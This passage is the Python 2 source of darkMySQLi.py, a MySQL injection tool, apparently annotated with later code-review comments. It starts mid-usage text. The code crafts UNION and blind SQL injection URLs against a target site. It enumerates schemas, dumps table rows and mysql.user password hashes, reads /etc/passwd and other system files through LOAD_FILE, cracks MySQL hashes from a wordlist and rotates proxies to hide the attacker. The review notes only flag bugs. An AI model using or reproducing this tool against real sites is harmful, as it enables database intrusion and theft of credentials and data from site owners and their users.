--debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL 
v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = 
sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. 
# darkMySQLi.py v1.6 (rsauron, 1/2009) -- main body of a MySQL injection helper.
# Python 2 only (print statements, urllib2, cookielib, str.encode("hex")).
#
# This excerpt starts inside the usage text of a `print` statement whose opening
# line is above this chunk; everything from `sys.exit(1)` onward is complete.
# Names used below but defined earlier in the file (not visible here):
#   GetThatShit()          - fetches a URL (presumably via the opener list built
#                            below and counting into `gets`) -- confirm
#   GuessValue()           - blind-SQLi numeric oracle; used as if it returns an
#                            int -- confirm
#   c1(), c2(), mysql323() - password hash helpers -- confirm what they strip
#   file, logfile          - the open log file object and its path
#   site, mode, proxy, arg_*, agents, colMax, ser_ver, version, num, table_num,
#   cur_db, cur_table, lim_num, let_pos, arg_rowdisp, loadfilefuzz, tablefuzz,
#   columnfuzz, gets
#
# Security review summary (details inline, tagged NOTE(review)):
#   - column names, --where / --orderby values, the --string regex and the
#     target URL are concatenated into queries/regexes without escaping;
#   - bare `except: pass` blocks hide every error, including oracle failures;
#   - the "authenticated proxy" path never installs a ProxyHandler, so those
#     proxies are not used and requests appear to go out directly;
#   - wordlist / proxy / fuzz files are opened and never closed.
-D is Optional\n[-] Need Help? --help\n"
    sys.exit(1)

# Proxy argument: a value with exactly one dot is treated as a file name
# (e.g. "proxies.txt") and read; anything else (e.g. "1.2.3.4:8080") is used
# as-is. Either way it becomes a list, one proxy per line.
if proxy != "None":
    if len(proxy.split(".")) == 2:
        proxy = open(proxy, "r").read()    # NOTE(review): file never closed
        if proxy.endswith("\n"):
            proxy = proxy.rstrip("\n")
    proxy = proxy.split("\n")
# Scheme normalisation: prefix http:// or https:// depending on --ssl.
if arg_ssl == "off":
    if site[:4] != "http":
        site = "http://"+site
else:
    if site[:5] != "https":
        site = "https://"+site
# Strip a trailing comment marker the user may have pasted from a manual PoC.
# NOTE(review): rstrip('/*') strips any run of '/' and '*' characters, not
# the two-character suffix; same for rstrip('--').
if site.endswith("/*"):
    site = site.rstrip('/*')
if site.endswith("--"):
    site = site.rstrip('--')
# Optional Mozilla-format cookie jar for authenticated targets.
if arg_cookie != "None":
    try:
        cj = cookielib.MozillaCookieJar()
        cj.load(arg_cookie)
        cookie_handler = urllib2.HTTPCookieProcessor(cj)
    except:
        print "[!] There was a problem loading your cookie file!"
        print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
        print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
        sys.exit(1)
else:
    cookie_handler = urllib2.HTTPCookieProcessor()
# Union modes need the literal marker "darkc0de" in the URL: it is the
# placeholder that site.replace() swaps for the SELECT expression below.
if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1:
    print "[-] Site must contain \'darkc0de\'\n"
    sys.exit(1)
if arg_blind == "--blind" and arg_string == "":
    print "[-] You must specify a --string when using blind methodology.\n"
    sys.exit(1)
if arg_columns != "None":
    arg_columns = arg_columns.split(",")
if arg_insert != "None":
    arg_insert = arg_insert.split(",")
if mode == "--crack" and arg_wordlist == "":
    print "[-] You must specify a --wordlist to crack with.\n"
    sys.exit(1)
# One random User-Agent per run (list defined earlier).
agent = random.choice(agents)
file.write("\n|--------------------------------------------------|")
file.write("\n| rsauron@gmail.com v1.6 |")
file.write("\n| 1/2009 darkMySQLi.py |")
file.write("\n| -- Multi Purpose MySQL Injection Tool -- |")
file.write("\n| Usage: darkMySQLi.py [options] |")
file.write("\n| -h help darkc0de.com |")
file.write("\n|--------------------------------------------------|")

## MySQL Hash cracking -- offline dictionary attack, no network use.
## 40 hex chars = MySQL 4.1+ (SHA1-based) hash; 16 hex chars = pre-4.1 hash.
if mode == "--crack":
    try:
        arg_wordlist = open(arg_wordlist, "r")
    except(IOError):
        print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n")
        sys.exit(1)
    if len(arg_hash) != 40 and len(arg_hash) != 16:
        print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n")
        sys.exit(1)
    arg_wordlist = arg_wordlist.readlines()
    print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist)))
    if len(arg_hash) == 40:
        print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash)
        # hashlib path (Python >= 2.5), falling back to the old `sha` module.
        # NOTE(review): unlike the v4 branch below, `word` is NOT rstripped
        # here, so the trailing "\n" is part of what gets hashed unless c1/c2
        # strip it themselves -- confirm against their definitions.
        try:
            import hashlib
            for word in arg_wordlist:
                if arg_hash == c1(word):
                    print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                    break
        except(ImportError):
            import sha
            for word in arg_wordlist:
                if arg_hash == c2(word):
                    print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word)
                    break
    else:
        print "[+] Detected MySQL v4 Hash:",arg_hash
        print "[+] Try darkc0de hash database @ "
        for word in arg_wordlist:
            word = word.rstrip("\n")
            if arg_hash == mysql323(word):
                print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n")
                break
    print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n")
    sys.exit(1)

#General Info -- echo the run configuration to console and log.
print "[+] URL:",site;file.write("\n\n[+] URL: "+site)
print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end)
print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie)
if site[:5] == "https":
    print "[+] SSL: Yes";file.write("\n[+] SSL: Yes")
else:
    print "[+] SSL: No";file.write("\n[+] SSL: No")
print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent)

#Build proxy list -- one urllib2 opener per working proxy; each proxy is
# probed with a live request to http://www.google.com (an OPSEC tell: every
# proxy, and the direct route for the auth branch, touches google.com).
proxy_list = [];proxy_list_count = []
if proxy != "None":
    print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...")
    for p in proxy:
        try:
            match = re.findall(":",p)
            # Three colons => "host:port:user:pass" (authenticated proxy).
            if len(match) == 3:
                arg_proxy_auth = []
                prox = p.split(":")
                arg_proxy_auth += prox
                if arg_proxy_auth != "":
                    # NOTE(review): only an HTTPBasicAuthHandler is installed --
                    # there is no ProxyHandler for p -- so this opener does not
                    # route through the proxy at all; the probe below and all
                    # later requests via this opener appear to go out directly.
                    proxy_auth_handler = urllib2.HTTPBasicAuthHandler()
                    proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3])
                    opener = urllib2.build_opener(proxy_auth_handler)
                    opener.open("http://www.google.com")
                    proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler))
                    proxy_list_count.append(p);arg_proxy_auth = ""
            else:
                # Plain "host:port" proxy; only the http scheme is proxied, so
                # an https:// target bypasses it.
                proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                opener = urllib2.build_opener(proxy_handler)
                opener.open("http://www.google.com")
                proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
                proxy_list_count.append(p)
            if len(match) == 3 or len(match) == 1:
                print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success")
            else:
                # NOTE(review): arg_proxy_auth was reset to "" above, so this
                # index raises and the proxy is reported as failed even though
                # it was already appended to proxy_list.
                print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success")
        except:
            print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0]))
            pass
    if len(proxy_list) == 0:
        print "[-] All proxies have failed. App Exiting"
        sys.exit(1)
    print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener(cookie_handler))
    proxy_list_count.append("None")
# Rotation state for the opener list (consumed by GetThatShit, presumably).
proxy_num = 0
proxy_len = len(proxy_list)

## Blind String checking! -- sanity-check the --string oracle against a
## known-true page ("AND 1=1"); it must appear exactly once.
if arg_blind == "--blind":
    print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!")
    head_URL = site+"+AND+1=1"
    source = GetThatShit(head_URL)
    # NOTE(review): arg_string is used as a regular expression everywhere, not
    # as a literal; a string containing '.', '(' or '?' matches something
    # else than the user typed (re.escape would be needed for literal use).
    match = re.findall(arg_string,source)
    if len(match) >= 2:
        print "\n[-] The String you used has been found on the target page in-use more than 2 times"
        print "[-] This might lead to false positives with the blind methodology"
        print "[-] Might not mean anything.. I am just trying to help out.."
        print "[-] If you have problems you might know why.. ;-)\n"
    if len(match) == 0:
        print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n"
        sys.exit(1)
    if len(match) == 1:
        print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)")

#Column Finder c0de -- grow "UNION SELECT 0x...,0x...,..." one column at a
# time (up to colMax); each column carries a distinct hex-encoded marker
# "dark<N>code". When the page echoes any marker, the column count is known
# and the echoed markers reveal which columns are reflected.
if mode == "--findcol":
    print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...")
    print "[+] Testing: ",
    file.write("\n[+] Testing: ",)
    checkfor=[];nullFound=[];nullnum=[];makepretty = ""
    sitenew = site+"+AND+1=2+UNION+SELECT+"
    for x in xrange(1,colMax):
        try:
            sys.stdout.write("%s," % (x))
            file.write(str(x)+",")
            sys.stdout.flush()
            darkc0de = "dark"+str(x)+"code"
            checkfor.append(darkc0de)
            if x > 1:
                sitenew += ","
            sitenew += "0x"+darkc0de.encode("hex")
            finalurl = sitenew+arg_end
            source = GetThatShit(finalurl)
            for y in checkfor:
                colFound = re.findall(y,source)
                if len(colFound) != 0:
                    nullFound.append(colFound[0])
            if len(nullFound) >= 1:
                print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor)))
                print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",)
                for z in nullFound:
                    nullcol = re.findall(("\d+"),z)
                    nullnum.append(nullcol[0])
                    sys.stdout.write("%s," % (nullcol[0]))
                    file.write(str(nullcol[0])+",")
                    sys.stdout.flush()
                # "1,2,...,N" column list for the printable URL.
                for z in xrange(0,len(checkfor)):
                    z+=1
                    if z > 1:
                        makepretty += ","
                    makepretty += str(z)
                site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end
                print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site)
                # Replace the reflected column numbers by the "darkc0de"
                # placeholder the other modes expect.
                # NOTE(review): the first pattern assumes the separator before
                # column 1 is "+", but it is arg_eva above, so with a non-default
                # evasion string a reflected column #1 is not replaced.
                for z in nullnum:
                    site = site.replace("+"+z+",","+darkc0de,")
                    site = site.replace(","+z+",",",darkc0de,")
                    site = site.replace(","+z+arg_end,",darkc0de"+arg_end)
                print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site)
                print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
                print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
                print "[-] Done\n";file.write("\n[-] Done\n")
                print "Don't forget to check", logfile,"\n"
                file.close();sys.exit(1)
        except (KeyboardInterrupt, SystemExit):
            raise
        except:
            # NOTE(review): swallows everything (network errors, regex errors),
            # so a failing target looks like "column length not found".
            pass
    print "\n[!] Sorry Column Length could not be found."
    file.write("\n[!] Sorry Column Length could not be found.")
    print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!"
    print "[-] Done\n"
    sys.exit(1)

#Retrieve version:user:database -- union mode: inject
# concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20) into the
# reflected column and parse the 0x1e-delimited fields back out of the page.
if arg_blind != "--blind":
    head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
    print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n")
    source = GetThatShit(head_URL)
    # NOTE(review): \S+ stops at the first whitespace, so a version/user/
    # database value containing a space truncates the remaining fields.
    match = re.findall("\x1e\x1e\S+",source)
    if len(match) >= 1:
        match = match[0][0:].split("\x1e")
        version = match[2]
        user = match[3]
        database = match[4]
        print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n")
        print "\tUser:", user;file.write("\tUser: "+user+"\n")
        print "\tVersion:", version;file.write("\tVersion: "+version)
    else:
        print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n"
        sys.exit(1)
else:
    # Blind mode: test the major version digit (ser_ver, starting value
    # defined earlier) with substring(@@version,1,1)=N, giving up after 6.
    print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...")
    while 1:
        config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
        source = GetThatShit(config_URL)
        match = re.findall(arg_string,source)
        if len(match) >= 1:
            print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
            version += str(ser_ver)
            break
        if ser_ver == 6:
            print "[-] Was unable to determine MySQL version.\n[-] Done"
            sys.exit(1)
        ser_ver+=1

#lets check what we can do based on version -- information_schema needs 5.x.
if mode == "--schema" or mode == "--dbs" or mode == "--full":
    if version[0] == str(4):
        print "\n[-] Mode Selected is incompatible with MySQL v4 Servers"
        print "[-] -h for help"
        sys.exit(1)

# Mode --info (union): probe mysql.user access, dump host:user:password, then
# probe LOAD_FILE() and optionally fuzz for readable system files.
if mode == "--info" and arg_blind != "--blind":
    # If the marker survives "... FROM mysql.user", the user can read that table.
    head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end
    source = GetThatShit(head_URL)
    match = re.findall("darkc0de",source)
    if len(match) >= 1:
        yesno = "YES <-- w00t w00t"
    else:
        yesno = "NO"
    print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
    if yesno == "YES <-- w00t w00t":
        print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
        head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
        print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
        head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
        head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
        for x in range(0,int(userend)):
            try:
                source = GetThatShit(head_URL.replace("NUM",str(x)))
                match = re.findall("\x1e\x1e\S+",source)
                match = match[0].strip("\x1e").split("\x1e")
                if len(match) != 3:
                    nullvar = "NULL"
                    # NOTE(review): list += str extends by characters, so this
                    # appends 'N','U','L','L' rather than one "NULL" element;
                    # a 2-field row prints "N" as its password column.
                    match += nullvar
                print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
            except (KeyboardInterrupt, SystemExit):
                raise
            except:
                pass
    else:
        print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
        file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
    # LOAD_FILE probe: 0x2f6574632f706173737764 is hex("/etc/passwd"),
    # 0x6461726b63306465 is hex("darkc0de").
    head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
    source = GetThatShit(head_URL)
    match = re.findall("darkc0de",source)
    if len(match) >= 1:
        yesno = "YES <-- w00t w00t"
    else:
        yesno = "NO"
    print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
    if yesno == "YES <-- w00t w00t":
        fuzz_load = open(loadfilefuzz, "r").readlines()    # NOTE(review): never closed
        # Magic-quotes test: a quoted path that still works means quotes are
        # not being escaped. NOTE(review): this uses `> 1` where the access
        # probes above use `>= 1` -- one marker is enough to prove it worked.
        head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("darkc0de",source)
        if len(match) > 1:
            onoff = "OFF <-- w00t w00t"
        else:
            onoff = "ON"
        print "\n[+] Magic quotes are:",onoff
        yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
        if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
            print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
            print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
            for sysfile in fuzz_load:
                sysfile = sysfile.rstrip("\n")
                # NOTE(review): when a proxy is in use the path is URL-encoded
                # first, and the hex branch below then hex-encodes "%2Fetc..."
                # rather than "/etc...", so LOAD_FILE gets a wrong path.
                if proxy != "None":
                    sysfile = sysfile.replace("/","%2F")
                    sysfile = sysfile.replace(".","%2E")
                if onoff == "OFF <-- w00t w00t":
                    head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
                else:
                    head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
                source = GetThatShit(head_URL)
                match = re.findall("darkc0de",source)
                if len(match) > 0:
                    print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
                    head_URL = head_URL.replace("concat(","")
                    head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
                    print "[!]",head_URL;file.write("\n[!] "+head_URL)
    else:
        print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
        file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")

#Fuzz table/columns -- guess table names from a wordlist (MySQL 4 friendly,
# no information_schema); for each hit, guess column names the same way.
if mode == "--fuzz":
    fuzz_tables = open(tablefuzz, "r").readlines()      # NOTE(review): never closed
    fuzz_columns = open(columnfuzz, "r").readlines()    # NOTE(review): never closed
    print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
    print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
    print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
    print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
    # "TABLE" / "COLUMN" are literal placeholders substituted per candidate.
    if arg_blind == "--blind":
        fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
    else:
        fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
    for table in fuzz_tables:
        table = table.rstrip("\n")
        table_URL = fuzz_URL.replace("TABLE",table)
        source = GetThatShit(table_URL)
        if arg_blind == "--blind":
            match = re.findall(arg_string,source)
        else:
            match = re.findall("darkc0de", source);
        if len(match) > 0:
            print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
            print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
            if arg_blind == "--blind":
                table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
            for column in fuzz_columns:
                column = column.rstrip("\n")
                if arg_blind == "--blind":
                    column_URL = table_URL.replace("COLUMN",column)
                else:
                    # Wordlist entries go straight into the query unescaped.
                    column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
                source = GetThatShit(column_URL)
                if arg_blind == "--blind":
                    match = re.findall(arg_string,source)
                else:
                    match = re.findall("darkc0de",source)
                if len(match) > 0:
                    print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
            print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")

#Build URLS for each different mode -- every mode produces count_URL (row /
# table / column count) and line_URL (one row per "NUM" in union mode, one
# character per position in blind mode). Database and table names are
# hex-literal encoded (0x...) so they need no quotes; column names are not.
if mode == "--schema":
    if arg_database != "None" and arg_table == "None":
        if arg_blind == "--blind":
            print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
            count_URL = site+"+and+((SELECT+COUNT(table_name)"
            count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
            line_URL = site+"+and+ascii(substring((SELECT+table_name"
            line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
        else:
            print "[+] Showing Tables & Columns from database \""+arg_database+"\""
            file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
            line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
            line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
            count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
        arg_row = "Tables"
    if arg_database != "None" and arg_table != "None":
        if arg_blind == "--blind":
            print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
            file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            count_URL = site+"+and+((SELECT+COUNT(column_name)"
            count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
            line_URL = site+"+and+ascii(substring((SELECT+column_name"
            line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
        else:
            print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
            file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
            line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
            count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
        arg_row = "Columns"
elif mode == "--dump":
    print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
    print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
    if arg_blind == "--blind":
        # Blind: concat(col1,0x3a,col2,...) -- 0x3a is ':'.
        darkc0de = ""
        for column in arg_columns:
            darkc0de += column+",0x3a,"
        # NOTE(review): rstrip("0x3a,") strips any trailing run of the
        # characters '0','x','3','a',',' -- a last column named e.g. "data"
        # becomes "dat". The intent is to drop the literal suffix ",0x3a,".
        darkc0de = darkc0de.rstrip("0x3a,")
        count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
        line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
    else:
        # NOTE(review): darkc0de is not initialised in this branch; it must
        # already hold the "concat(0x1e,0x1e," prefix from earlier in the file
        # (outside this excerpt) for the closing "0x1e,0x20)" to balance -- confirm.
        for column in arg_columns:
            darkc0de += column+",0x1e,"
        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
        line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
    if arg_where != "" or arg_orderby != "":
        if arg_where != "":
            # --where col,value -> "WHERE col=0x<hex(value)>"
            arg_where = arg_where.split(",")
            print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
            arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
        if arg_orderby != "":
            # NOTE(review): single-quoting the column name turns it into a string
            # constant, and "ORDER BY 'name'" does not sort by that column.
            arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
            print "[+] ORDERBY clause:",arg_orderby
        count_URL += "+"+arg_where
